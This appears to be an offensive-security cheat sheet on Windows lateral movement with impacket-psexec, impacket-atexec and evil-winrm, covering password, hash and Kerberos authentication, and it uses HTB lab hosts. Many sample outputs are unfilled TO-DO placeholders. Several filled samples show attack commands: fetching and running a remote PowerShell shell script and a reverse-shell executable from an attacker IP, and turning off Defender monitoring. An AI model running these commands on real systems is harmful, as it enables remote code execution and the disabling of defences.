Authentication Method
PsExec - Interactive Shell
Domain
# Password
impacket-psexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output:
TO-DO
# NTLM
impacket-psexec '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH>
Sample Output:
TO-DO
# Password-based Kerberos
impacket-psexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output:
TO-DO
# NTLM-based Kerberos
impacket-psexec '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k
Sample Output:
TO-DO
# Ticket-based Kerberos
impacket-psexec '<DOMAIN>/<USER>@<TARGET>' -k -no-pass
Sample Output:
TO-DO
Local auth
# Password
impacket-psexec '<USER>:<PASSWORD>@<TARGET>'
Sample Output:
TO-DO
# NTLM
impacket-psexec '<USER>@<TARGET>' -hashes :<HASH>
Sample Output:
TO-DO
AtExec - Run Immediate Scheduled Task
Domain
# Password
impacket-atexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' 'powershell.exe -c "<CMD>"'
Sample Output:
TO-DO
# NTLM
impacket-atexec '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> 'powershell.exe -c "<CMD>"'
Sample Output:
TO-DO
# Password-based Kerberos
impacket-atexec '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k 'powershell.exe -c "<CMD>"'
Sample Output:
TO-DO
# NTLM-based Kerberos
impacket-atexec '<DOMAIN>/<USER>@<TARGET>' -hashes :<HASH> -k 'powershell.exe -c "<CMD>"'
Sample Output:
TO-DO
# Ticket-based Kerberos
impacket-atexec '<DOMAIN>/<USER>@<TARGET>' -k 'powershell.exe -c "<CMD>"'
Sample Output:
TO-DO
Local Auth
# Password
impacket-atexec '<WORKGROUP>/<USER>:<PASSWORD>@<TARGET>' 'powershell.exe -c "<CMD>"'
Sample Output:
impacket-atexec 'WORKGROUP/test:test@192.168.10.2' 'powershell.exe -c "iex(iwr http://192.168.10.1:8443/shell.ps1 -UseBasicParsing)"'
# NTLM
impacket-atexec '<WORKGROUP>/<USER>@<TARGET>' -hashes :<HASH> 'powershell.exe -c "<CMD>"'
Sample Output:
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] This will work ONLY on Windows >= Vista
[*] Creating task \gNBJCrJi
[*] Running task \gNBJCrJi
[*] Deleting task \gNBJCrJi
[*] Attempting to read ADMIN$\Temp\gNBJCrJi.tmp
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "Set-MpPreference -ExclusionPath C:\\"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] This will work ONLY on Windows >= Vista
[*] Creating task \cbUEDAaz
[*] Running task \cbUEDAaz
[*] Deleting task \cbUEDAaz
[*] Attempting to read ADMIN$\Temp\cbUEDAaz.tmp
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "iwr 10.8.7.13:8443/rev.exe -outfile C:\programdata\rev.exe"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] This will work ONLY on Windows >= Vista
[*] Creating task \RmSAvink
[*] Running task \RmSAvink
[*] Deleting task \RmSAvink
[*] Attempting to read ADMIN$\Temp\RmSAvink.tmp
$ impacket-atexec -hashes :a29542cb2707bf6d6c1d2c9311b0ff02 'WS01/administrator@WS01.example.com' 'powershell.exe -c "C:\programdata\rev.exe"'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] This will work ONLY on Windows >= Vista
[*] Creating task \LCpKICMQ
[*] Running task \LCpKICMQ
[*] Deleting task \LCpKICMQ
[*] Attempting to read ADMIN$\Temp\LCpKICMQ.tmp
evil-winrm-py
evil-winrm-py -i <TARGET> -u '<USER>' -p '<PASSWORD>'
Sample Output:
TO-DO
evil-winrm-py -i <TARGET> -u '<USER>' -H '<HASH>'
Sample Output:
TO-DO
# Step 1: Configure '/etc/krb5.conf' (All in UPPERCASE; the [domain_realm] entries map the target's DNS domain suffix to the realm)
[libdefaults]
default_realm = <DOMAIN>
[realms]
<DOMAIN> = {
kdc = <DC>:88
admin_server = <DC>
default_domain = <DOMAIN>
}
[domain_realm]
.domain.internal = <DOMAIN>
domain.internal = <DOMAIN>
Sample Output:
[libdefaults]
default_realm = WINDCORP.HTB
[realms]
WINDCORP.HTB = {
kdc = HOPE.WINDCORP.HTB:88
admin_server = HOPE.WINDCORP.HTB
default_domain = WINDCORP.HTB
}
[domain_realm]
.domain.internal = WINDCORP.HTB
domain.internal = WINDCORP.HTB
# Step 2: Request a ticket
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO
# Step 3: Pass-the-ticket
export KRB5CCNAME=<CCACHE>
Sample Output:
$ export KRB5CCNAME=winrm_user.ccache
# Step 4: Connect
sudo ntpdate -s <DC_IP> && evil-winrm-py -i <TARGET> -u '<USER>' -k --no-pass
Sample Output:
TO-DO
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && evil-winrm-py -i <TARGET> -u '<USER>' -p '<PASSWORD>' -k
Sample Output:
TO-DO
evil-winrm-py -i <TARGET> -u '<USER>' --priv-key-pem <PRIV_KEY_PEM> --cert-pem <CERT_PEM>
Sample Output:
TO-DO
# Port 5986 SSL
sudo ntpdate -s <DC_IP> && evil-winrm-py -i <TARGET> -u '<USER>' -k --no-pass --ssl
Sample Output:
TO-DO
evil-winrm
evil-winrm -i <TARGET> -u '<USER>' -p '<PASSWORD>'
Sample Output:
$ evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'qwe123QWE!@#'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents>
evil-winrm -i <TARGET> -u '<USER>' -H <HASH>
Sample Output:
TO-DO
# Step 1: Configure '/etc/krb5.conf' (All in UPPERCASE; the [domain_realm] entries map the target's DNS domain suffix to the realm)
[libdefaults]
default_realm = <DOMAIN>
[realms]
<DOMAIN> = {
kdc = <DC>:88
admin_server = <DC>
default_domain = <DOMAIN>
}
[domain_realm]
.domain.internal = <DOMAIN>
domain.internal = <DOMAIN>
Sample Output:
[libdefaults]
default_realm = WINDCORP.HTB
[realms]
WINDCORP.HTB = {
kdc = HOPE.WINDCORP.HTB:88
admin_server = HOPE.WINDCORP.HTB
default_domain = WINDCORP.HTB
}
[domain_realm]
.domain.internal = WINDCORP.HTB
domain.internal = WINDCORP.HTB
# Step 2: Request a ticket
sudo ntpdate -s <DC_IP> && impacket-getTGT '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP>
Sample Output:
TO-DO
# Step 3: Pass-the-ticket
export KRB5CCNAME=<CCACHE>
Sample Output:
$ export KRB5CCNAME=winrm_user.ccache
# Step 4: Connect
sudo ntpdate -s <DC_IP> && evil-winrm -i <TARGET> -r <DOMAIN>
Sample Output:
$ evil-winrm -i dc.absolute.htb -r absolute.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_user\Documents>
evil-winrm -i <TARGET> -S -k <KEY> -c <CRT>
Sample Output:
TO-DO
Disable WinRM
Disable-PSRemoting -Force
Sample Output:
TO-DO
Stop-Service WinRM -PassThru
Sample Output:
TO-DO
Set-Service WinRM -StartupType Disabled -PassThru
Sample Output:
TO-DO